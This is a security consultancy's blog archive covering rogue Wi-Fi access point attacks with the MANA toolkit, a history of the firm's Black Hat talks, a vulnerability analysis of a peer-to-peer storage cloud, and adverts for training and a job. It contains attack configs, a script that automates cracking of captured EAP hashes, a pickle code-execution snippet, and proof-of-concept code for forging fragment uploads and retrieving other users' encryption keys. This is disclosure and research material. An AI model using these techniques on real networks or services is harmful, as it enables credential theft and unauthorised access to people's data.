
Mon, 9 Mar 2015

Break the Web at BlackHat Singapore

Web application security training in 2015?

It's a valid question we get asked sometimes. With the number of books available on the subject, the tools that seemingly automate the process, and the fact that finding bugs in web apps should be harder now that frameworks and developers are more likely to produce secure code, is there still a need to train people in the art of application exploitation?


Our response is yes. Our application assessment course constantly changes. We look at the thousands of assessments we perform for our customers, take the vulnerabilities discovered along with new architectures and designs, and build practical exploitation scenarios for our students. We love breaking the web, the cloud, 'the box that's hosted somewhere you can't recall but just works', as there are always new approaches and methods one can take to own the application layer.


Last month I discovered a vulnerability in Red Hat's OpenStack Platform. What was cool about this vulnerability is that it's not a new class of bug, but when the platform is deployed in an organisation, it allows an authenticated user to read files on the filesystem with the permissions of the web server. Owning organisations is all about exploiting flaws and chaining them together to achieve the end goal.


We want to teach you the same process: learning how to own the application layer, whilst having fun doing it, at Black Hat Asia in Singapore.


During the course we will cover:


  • Introduction to the hacker mindset (more important than it sounds!)

  • Reconnaissance techniques.


...and...breaking the web...

  • Understanding and exploiting data validation issues such as SQLi, XSS, XML and LDAP injections.

  • Session Management issues...oh cookies!

  • Attacking web services.

  • A glance at client-side technologies such as Silverlight and ActiveX.


This course will be hands-on. It won't just be me standing up and speaking; you'll be learning how to own web apps and exploit common vulnerabilities just like the best.


Come and join us! It will be fun :)


/S

Mon, 23 Feb 2015

Improvements in Rogue AP attacks - MANA 1/2

At Defcon 22 we presented several improvements in wifi rogue access point attacks. We entitled the talk "Manna from heaven" and released the MANA toolkit. I'll be doing two blog entries: the first will describe the improvements made at the wifi layer, and the second will cover the network credential interception stuff. If you just want the goodies, you can get them at the end of this entry for the price of scrolling down.


Introduction


This work is about rogue access points, by which we mean a wireless access point that mimics real ones in an attempt to get users to connect to it. The initial work on this was done in 2004 by Dino Dai Zovi and Shane Macaulay. They realised that wifi devices probe for the wireless networks they've "remembered" without authentication, and that if a malicious access point merely responds to these directed probes, it can trick wireless clients into connecting to it. They called this a KARMA attack.


Additionally, in 2008 Josh Wright and Brad Antoniewicz worked out that if you man-in-the-middle the EAP authentication on secured networks, you can capture the challenge/response hash, crack it and gain access to the network yourself. They implemented this in freeradius-wpe (wireless pwnage edition).


However, KARMA attacks no longer work well, and we wanted to know why. Also, the WPE stuff seemed ripe for use in rogue access points rather than just for gaining access to the original network. This is what we implemented.


Changes in Probing


After a significant amount of time poring over radio captures of the ways in which various devices probe, and informed by our previous work on Snoopy, we realised two things. The first is that modern devices, particularly mobile ones, won't listen to directed probe responses for open, non-hidden networks if the AP didn't also (or first) respond to a broadcast probe. This means our rogue access point needs to do the same. The challenge, however, is what to respond to the broadcast probe *with*.


To overcome that, we took the existing KARMA functionality built by Digininja, ported it to the latest version of hostapd and extended it to store a view of the "remembered networks" (aka the Preferred Network List, or PNL) of each device it sees. When hostapd-mana sees a broadcast probe from a device, it responds with a directed probe response for each network it knows to be in that device's PNL. This is based on our finding that wifi clients have no problem with a single BSSID (i.e. AP MAC address) advertising several ESSIDs (aka SSIDs, aka network names).


Practically, suppose there are two devices, one probing for a network foo, and the other probing for two networks bar and baz. When device1 sends a broadcast probe, hostapd-mana will respond with a directed probe response for foo to device1. Likewise, when device2 sends a broadcast probe, hostapd-mana will respond with two directed probe responses to device2, one for bar and one for baz. In addition, the "normal" KARMA functionality of responding to directed probes still occurs. In practice, we found this significantly improved the effectiveness of our rogue AP.
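

The bookkeeping itself is simple; here's a minimal Python sketch of the per-device PNL logic described above. It illustrates the approach only, not hostapd-mana's actual C implementation, and the function name is ours:

    # Sketch of per-device PNL tracking, as described above.
    # Illustrative only -- the real logic lives in hostapd-mana's C code.

    from collections import defaultdict

    pnl = defaultdict(set)  # device MAC -> set of ESSIDs it has probed for

    def handle_probe(device_mac, essid):
        """Process a probe request; return the ESSIDs to answer with."""
        if essid:  # directed probe: remember it, then respond (classic KARMA)
            pnl[device_mac].add(essid)
            return [essid]
        # broadcast probe: respond once per network in that device's PNL
        return sorted(pnl[device_mac])

    # device1 probes for foo; device2 probes for bar and baz
    handle_probe("aa:aa:aa:aa:aa:aa", "foo")
    handle_probe("bb:bb:bb:bb:bb:bb", "bar")
    handle_probe("bb:bb:bb:bb:bb:bb", "baz")

    print(handle_probe("aa:aa:aa:aa:aa:aa", None))  # ['foo']
    print(handle_probe("bb:bb:bb:bb:bb:bb", None))  # ['bar', 'baz']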


iOS and hidden networks


iOS presented an interesting challenge when it came to hidden networks. A hidden network is one configured not to broadcast its ESSID in either its beacons or broadcast probe responses. Practically, the only way a client device can know whether a remembered hidden network is nearby is by constantly sending out directed probes for it. This is why hidden networks aren't a very good design: their clients need to spew the network's name out all over the place. However, while iOS devices could join a hidden network just fine, they seemed not to probe for it most of the time. This had us constructing Faraday cages and checking other factors like BSSID and geolocation, to no avail, until we realised that iOS will not probe for any hidden networks in its PNL unless there is at least one hidden network nearby. So, if you'd like to maximise your rogue'ing, make sure you have a hidden network nearby. It doesn't even need to be a real network; use a MiFi, use airbase-ng, or just create another hostapd network.
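

If you want to script that decoy, a minimal hostapd configuration along these lines should do; the interface name, ssid and channel below are placeholders:

    # decoy-hidden.conf -- a throwaway hidden network to wake up iOS.
    # Run with: hostapd decoy-hidden.conf
    interface=wlan1
    driver=nl80211
    ssid=decoy
    hw_mode=g
    channel=6
    # omit the ESSID from beacons, i.e. run as a "hidden" network
    ignore_broadcast_ssid=1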


Limits in probing


Modern mobile devices probe for networks on their PNL *significantly* less than laptops or older devices do. In an ideal world, manufacturers would change the implementation to never probe for open networks and only wait for responses to broadcast probes, effectively limiting these attacks to requiring pre-knowledge, common networks, or being performed in the vicinity of the actual network. In fact, a patch was pushed to wpa_supplicant a few months ago to limit the stupid probing behaviour Android exhibits in low-power mode, and this should make it into Android proper soon. iOS has also significantly reduced how often it probes.


There are two ways to work around this. The first is manual: go for a common network. The rise of city-wide wifi projects makes this somewhat easy; or, if you're going after a corporate network, do some recon and name one of your access points after it. But we wanted to do better than that. The default behaviour of hostapd-mana is to build up a view of each device's PNL and respond to broadcasts only with networks specific to that device. However, we can remove that limitation, build a global PNL, and respond to each broadcast probe with every network any device has probed for. We call this loud mode, and it's configurable in the hostapd-mana config. It relies on the fact that many devices, particularly laptops and older mobile devices, still probe for networks a lot, and that many devices have networks in common (the same city, same airport, same conference, same company, same pocket, etc.). This works *very* well in less crowded areas, and you'll get a much higher number of devices connecting.
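

For reference, loud mode is just a config switch. A sketch of the relevant hostapd-mana options follows; the interface, ssid and channel are placeholders, and you should check the toolkit's README for the authoritative option names:

    # Excerpt from a hostapd-mana config.
    interface=wlan0
    ssid=Internet
    channel=6
    # turn on the MANA probe-response behaviour described above
    enable_mana=1
    # respond to every broadcast probe with the global PNL ("loud mode")
    mana_loud=1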


However, in busy areas, or if your antenna is large enough, you'll quickly exceed the capacity of your average wifi device to respond fast enough to all of the probing devices, and as the number of probe responses grows rapidly with each new device, this problem crops up even in quiet areas over time (though, miraculously, it didn't on stage at Defcon). So it's *good enough* for now, but needs an in-kernel or in-firmware implementation with some network ageing to scale better (one of the many opportunities for extending this work, if you're up for some open source contribution).


Auto Crack 'n Add


freeradius-wpe is great: it provides a nice way to grab EAP hashes from clients that don't validate the certificates presented by TLS-based EAP methods (PEAP, EAP-GTC, EAP-TTLS). However, the patches are for FreeRADIUS v1 and, much like the KARMA patches for hostapd, have aged. But hostapd contains a RADIUS server, so we ported the freeradius-wpe work to that, basing it on some initial but incomplete patches by Brad Antoniewicz. hostapd-mana will therefore also let you grab EAP hashes without needing another tool.


However, KARMA attacks only work against open wifi networks. EAP networks are increasingly common (especially corporate ones), and we wanted to have a go at getting devices probing for those to connect to our rogue AP too. To do this, we modified hostapd-mana to accept any EAP attempt, but to capture the hash and send it off for cracking. It simply writes the hashes to a file, from which the simple Python tool crackapd (included) grabs them and hands them to another process for cracking. Currently we use asleap (also by Josh) and the rockyou password list, but this can easily be changed; for example, to use CloudCracker and its incredibly optimised MS-CHAPv2 cracking setup.
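

A stripped-down sketch of that crack-and-add loop is below. The file path and the "user|challenge|response" record format are our illustrative assumptions; the real crackapd handles hostapd-mana's actual output format, which may differ:

    #!/usr/bin/env python
    # Minimal crackapd-style loop: watch for new EAP challenge/response
    # pairs, hand each to asleap with a wordlist, and print any cracked
    # credentials. Paths and record format are illustrative assumptions.

    import subprocess
    import time

    HASH_FILE = "/var/run/hostapd.hashes"           # hypothetical location
    WORDLIST = "/usr/share/wordlists/rockyou.txt"

    seen = set()
    while True:
        try:
            lines = open(HASH_FILE).read().splitlines()
        except IOError:
            lines = []
        for line in lines:
            if not line.strip() or line in seen:
                continue
            seen.add(line)
            user, challenge, response = line.split("|")
            try:
                # asleap -C <challenge> -R <response> -W <wordlist>
                out = subprocess.check_output(
                    ["asleap", "-C", challenge, "-R", response, "-W", WORDLIST])
                print("[*] %s -> %s" % (user, out.decode().strip()))
            except subprocess.CalledProcessError:
                pass  # not cracked (yet); the device will keep retrying
        time.sleep(5)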


The net result is pretty great for simple EAP hashes. The device will try to connect and fail, as we don't know enough to complete the challenge/response correctly. But once the hash is cracked, the next time the device retries (something devices keep doing) it will succeed, and you'll have your first creds. For simple hashes this is transparent to the user. Of course, complex hashes will only work if you crack them in time; worst case, you leave with hashes.


Conclusion


So that's what we built into hostapd-mana. You get improved KARMA attacks, a modern hostapd version, an integrated hash stealer, and the possibility of rogue'ing some EAP networks. You can get the full toolkit at MANA toolkit on GitHub, or just the modified hostapd at hostapd-mana on GitHub.


The next blog entry will cover what we did once we got a device to connect.


The Goodies


The Defcon talk:


The supporting slide deck with more information:


The final toolkit: MANA toolkit on GitHub. You can also get it on Kali with "apt-get install mana-toolkit".


The modified hostapd (for hackers or people who want to build their own setup): hostapd-mana on GitHub

Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.


Under the hood, the Zigbee and Z-Wave wireless communication protocols are the most commonly used RF technologies in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security research efforts. Z-Wave is a proprietary wireless protocol that operates in the Industrial, Scientific and Medical (ISM) radio band. It transmits on the 868.42 MHz (Europe) and 908.42 MHz (United States) frequencies, designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.


Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol, except for a DefCon 2011 talk in which the presenter pointed to the possibility of capturing the AES key exchange... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and shows how the Z-Wave protocol can be subjected to attacks.


The talk is being presented by Behrang Fouladi, a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured out how to clone the RSA SecurID software token.


Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:



2002: Setiri : Advances in trojan technology (Roelof Temmingh)


Setiri was the first publicised trojan to implement the concept of using a web browser to communicate with its controller, and it caused a stir when we presented it in 2002. We were also very pleased when it was referenced in a 2004 book by Ed Skoudis.


2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)


A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually led to the creation of Maltego.


2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)


This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defense".


2005: Assessment automation (Roelof Temmingh)


Our thinking around pentest automation, in particular footprinting and link analysis, was further expanded upon. Here we also released the first version of our automated footprinting tool, "Bidiblah".


2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)


In this talk we literally did introduce two proxy tools. The first was "Suru", our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been surpassed by excellent tools like Burp Proxy, it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.


Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.


The second proxy we introduced operated at the TCP layer, leveraging the very excellent Scapy packet manipulation program. We never took that any further, however.


2007: It's all about timing (Haroon Meer and Marco Slaviero)


This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies, and introduced a weaponised timing-based data exfiltration attack in the form of our Squeeza SQL injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.


2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)


In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool, which can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL Server 2005 instance, even without 'sa' privileges.


2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)


Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud, discussing issues such as privacy, monoculture and vendor lock-in. The cloud offerings from Amazon, Salesforce and Apple, as well as their security, were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer, and we had a photo of Dino Dai Zovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.


2010: Cache on delivery (Marco Slaviero)


This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers, and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped, and to date the presentation has had almost 50,000 hits on Slideshare.


2011: Sour pickles (Marco Slaviero)


Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however, there was no public Pickle exploitation guide, and published exploits were simple examples only. In this paper we described the Pickle environment, outlined the hurdles facing a shellcoder and provided guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library. We also wrote a very fancy paper about it all...
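

The underlying primitive is easy to demonstrate: pickle's __reduce__ hook lets an object nominate a callable and arguments to be invoked at unpickling time. A minimal, well-known illustration (not the output of our generator):

    import os
    import pickle

    class Payload(object):
        # __reduce__ tells pickle to "reconstruct" this object by calling
        # os.system('id') -- i.e. arbitrary code runs on pickle.loads()
        def __reduce__(self):
            return (os.system, ("id",))

    blob = pickle.dumps(Payload())
    pickle.loads(blob)   # runs `id` -- never unpickle untrusted data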


We didn't present at Black Hat USA in 2012, although we did do some very cool work that year.


For this year's show we'll be back on the podium with Behrang's talk, as well as an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team, please consider one of our courses. We need all the support we can get, and we're pretty convinced you won't be disappointed.


See you in Vegas!

Fri, 12 Apr 2013

Analysis of Security in a P2P storage cloud

A cloud storage service such as Microsoft SkyDrive requires building data centres and carries ongoing operational and maintenance costs. An alternative approach is based on a distributed computing model, which utilises a portion of the storage and processing resources of consumer-level computers and SME NAS devices to form a peer-to-peer storage system. Members contribute some of their local storage space to the system and in return receive an "online backup and data sharing" service. Providing data confidentiality, integrity and availability in such a decentralised storage system is a big challenge. As the cost of data storage devices declines, there is debate about whether P2P storage can really save costs. I'll leave that debate to the critics; instead, I'll look into one peer-to-peer storage system and study its security measures and possible issues. An overview of the system's architecture is shown in the following picture:


Each node in the storage cloud receives an amount of free online storage space, which can be increased by the control server if the node agrees to "contribute" some of its local hard drive space to the system. The file synchronisation and contribution agents running on every node interact with the cloud control server and with other nodes, as shown in the above picture. Folder/file synchronisation is performed in the following steps:



1) The node authenticates itself to the control server and sends a file upload request, with file metadata including the SHA1 hash value, size, number of fragments and file name, over an HTTPS connection.


2) The control server replies with the AES encryption key for the relevant file/folder, an [IP address]:[port number] list of contributing nodes called the "endpoints list", and a file ID.


3) The file is split into blocks, each of which is encrypted with the above AES encryption key. The blocks are further split into 64 fragments, and redundancy information is added to them.


4) The node then connects to the contribution agent on each endpoint address received in step 2 and uploads one fragment to each of them (a sketch of this client-side flow follows below).
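

Put together, the client side of these four steps looks roughly like the sketch below. The control-server URL, JSON field names and the omitted redundancy step are our illustrative assumptions, not the vendor's actual protocol:

    # Hedged Python sketch of the client-side flow in steps 1-4 above.
    # URLs, field names and the redundancy scheme are assumptions.

    import hashlib
    import requests  # pip install requests

    CONTROL = "https://control.example.com"   # hypothetical control server

    def sync_file(session, path, encrypt):
        data = open(path, "rb").read()

        # step 1: authenticated metadata upload request over HTTPS
        meta = {"name": path, "size": len(data),
                "sha1": hashlib.sha1(data).hexdigest(), "fragments": 64}
        reply = session.post(CONTROL + "/upload-request", json=meta).json()

        # step 2: server returns the AES key, endpoints list and file ID
        key, endpoints, file_id = reply["key"], reply["endpoints"], reply["id"]

        # step 3: encrypt, then cut into 64 fragments (redundancy omitted)
        ciphertext = encrypt(key, data)       # AES; block details unspecified
        size = -(-len(ciphertext) // 64)      # ceiling division
        frags = [ciphertext[i:i + size]
                 for i in range(0, len(ciphertext), size)]

        # step 4: push one fragment to the agent on each endpoint
        # (the fragment naming scheme is discussed later in this post)
        for (ip, port), frag in zip(endpoints, frags):
            requests.put("http://%s:%s/fragment" % (ip, port), data=frag)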


Since the nodes are not under the full control of the control server, they may fall offline at any time, or the stored file fragments may be damaged or intentionally modified. As such, the control server needs to monitor node and fragment health regularly, so that it can move lost or damaged fragments to alternate nodes if need be. For this purpose, the contribution agent on each node maintains an HTTPS connection to the control server, over which it receives the following "tasks":


a) Adjust settings: instructs the node to modify its upload/download limits, contribution size, etc.


b) Block check: asks the node to connect to another contribution node and verify a fragment's existence and hash value.


c) Block recovery: asks the node to assist the control server in recovering a number of fragments.
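

Task (b), for example, amounts to something like the following sketch; the fragment URL layout is an illustrative assumption:

    # Sketch of a "block check": fetch a fragment from another node and
    # verify its SHA1. The URL layout is an illustrative assumption.

    import hashlib
    import requests

    def block_check(ip, port, fragment_name, expected_sha1):
        url = "http://%s:%s/%s" % (ip, port, fragment_name)
        body = requests.get(url).content
        # the boolean result is reported back to the control server
        return hashlib.sha1(body).hexdigest() == expected_sha1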


By delegating the above tasks, the control system places some degree of "trust" in, or at least makes "assumptions" about, the availability and integrity of the agent software running on the storage cloud nodes. However, those agents can be manipulated by malicious nodes in order to disrupt cloud operations, attack other nodes, or even gain unauthorised access to the distributed data. I limited the scope of my research to the synchronisation and contribution agent software of two storage nodes under my control, one of which was acting as a contribution node. I didn't include analysis of the system's encryption or redundancy in this preliminary research, because it could affect the live system and should only be performed in a test environment, which was not possible to set up as the target system's control server was not publicly available. Within the contribution agent alone, I found that I had unauthorised access not only to file storage (and download) on the cloud's nodes, but to the folder encryption keys as well.


a) Unauthorised file storage and download


The contribution agent created a TCP network listener that processed commands from the control server as well as requests from other nodes. The agent communicated over HTTP(S) with the control server and other nodes in the cloud. An example file fragment upload request from a remote node is shown below:



Uploading fragments with a format similar to the above path name resulted in a "bad request" error from the agent. This indicated that the fragment name should be related to its content, and that this condition is checked by the contribution agent before accepting the PUT request. By decompiling the agent software, it was found that the fragment name must have the following format to pass this validation:


<SHA1(uploaded content)>.<Fragment number>.<Global Folder Id>
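

Notably, every element of that name is derived from attacker-controlled values, so a valid name can be forged for arbitrary content. A short sketch (the agent's port, path layout and the example values are assumptions):

    # Forge a valid fragment name for arbitrary content and PUT it to a
    # contribution node. Port and path layout are illustrative assumptions.

    import hashlib
    import requests

    def push_fragment(ip, port, content, fragment_no, folder_id):
        name = "%s.%d.%s" % (hashlib.sha1(content).hexdigest(),
                             fragment_no, folder_id)
        return requests.put("http://%s:%s/%s" % (ip, port, name), data=content)

    # e.g. store notepad.exe on a remote node as "fragment 1" of any folder
    push_fragment("192.0.2.10", 8080,
                  open("notepad.exe", "rb").read(), 1, "12345")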


I used the above file fragment format to upload notepad.exe to the remote node successfully, as you can see in the following figure:



The download request (a GET request) was also successful, regardless of the validity of the "Global Folder Id" and "Fragment Number". The uploaded file was accessible for about 24 hours, until it was purged automatically by the contribution agent, probably because the agent never received any "Block Check" requests from the control server for this fragment. Twenty-four hours is still enough time for malicious users to abuse storage cloud nodes' bandwidth and storage to serve their content over the internet without the victims' knowledge.


b) Unauthorised access to folder encryption keys


The network listener responded to GET requests from any remote node, as mentioned above. This was intended to serve "Block Check" commands from the control server, which instruct a node to fetch a number of fragments from other nodes (referred to as "endpoints") and verify their integrity by re-calculating the SHA1 hash and reporting back to the control server. This appears to be part of the cloud's "health check" process, which ensures that distributed file fragments are accessible and have not been tampered with. The agent could also process "File Recovery" tasks from the control server, but I didn't observe any such command during dynamic analysis of the contribution agent, so I searched the decompiled code for clues about the file recovery process and found a code snippet suggesting that the agent is capable of retrieving encryption keys from the control server. This was odd, considering that each node should only have access to the encryption keys of its own folders, while it stores encrypted file fragments belonging to other nodes.


One possible explanation for the above file recovery code could be that the node first downloads its own file fragments from remote endpoints (using an endpoint list received from the control server) and then retrieves the required folder encryption key from the control server, in order to decrypt and re-assemble its own files. To test whether it was possible to abuse the file recovery operation to gain access to the encryption keys of folders belonging to other nodes, I extracted the folderInfo request format from the agent code and set up another storage node as a target. The test was successful, as shown in the following figure, and it was possible to retrieve the AES-256 encryption key for the folder ID "1099869693336". This could enable an attacker who has set up a contributing storage node to decrypt fragments belonging to other cloud users.
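

Schematically, the abuse looks like the sketch below. The actual folderInfo request format is not reproduced in this post, so the endpoint, parameter and response field names here are entirely hypothetical:

    # Hypothetical reconstruction of the key-retrieval abuse. The real
    # folderInfo request format (extracted from the agent code) is not
    # shown in this post; endpoint, parameter and field names are
    # placeholders only.

    import requests

    def get_folder_key(session, control_host, folder_id):
        reply = session.get("https://%s/folderInfo" % control_host,
                            params={"folderId": folder_id})
        return reply.json()["encryptionKey"]  # another node's AES-256 key

    # key = get_folder_key(authed_session, "control.example.com",
    #                      "1099869693336")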



Conclusion:


While peer-to-peer storage systems have lower setup and maintenance costs, they face security threats from storage nodes that are not under the direct physical or remote control of the cloud controller. Examples of such threats relate to the cloud's client agent software and the cloud server's authorisation controls, as demonstrated in this post. While analysis of the data encryption and redundancy in this peer-to-peer storage system would be an interesting future research topic, we hope that the findings from this research can be used to improve the security of various distributed storage systems.

Sat, 2 Mar 2013

IT Network Packet Wrangler


As we grow and operate across a number of continents, so grows our dependence on a rock-solid IT infrastructure. We are expanding our repertoire to include a greater collection of Linux/Open Source/Windows and OS X products. With this, we are on the look-out for a rock star to wrangle control of our internal networks and external cloud infrastructure, and to help us utilise technology in a way that makes us even better.


Job Title: IT Network Packet Wrangling Penguin Master


Salary Range: Industry standard, commensurate with experience


Location: Johannesburg/Pretoria, South Africa


Real Responsibilities:


  • Managing a growing internal network, both in ZA and the UK, and increasing cloud-based infrastructure

  • Championing the adoption of new technologies and new ways of working, and being incredibly excited about security. Yes, we like the type of person who scoffs at the idea of using a plain-text protocol


As a system / network administrator your daily duties and responsibilities will include:

  • Providing day-to-day Desktop, Server and Network administration, including helping plakkers (the name we give to all who work at SensePost) with their devices

  • Be capable of using a variety of operating systems

  • Ensuring our disaster recovery plan is working as it should

  • Being the go-to person for all those who require assistance with their IT

  • Maintaining and administering the telecommunications system

  • Administering the network to ensure that the systems in place run effectively and securely (we are, after all, a security company!)

  • A real passion for finding technology-led solutions to problems

  • Be excited about Unix firewalls, Cisco routers, wrangling network packets, VPN tunnelling and Wi-Fi

  • Able to hold a conversation and smile when mentioning SMTP/HTTP/IMAP/Python


Not essential, but bonus points for:

  • Actually getting a linux laptop to use an overhead projector, without resorting to swear words in Spanish and Afrikaans

  • Administering a Windows server without complaining, at all, not once, in fact, you actually kinda enjoy it.

  • Being really passionate about security and showing it doesn't have to get in the way of working productively.


If the above has got you thinking 'weird, it's like they are talking to me, bru!' then we want to hear from you. Send us a carrier pigeon message or send us a mail.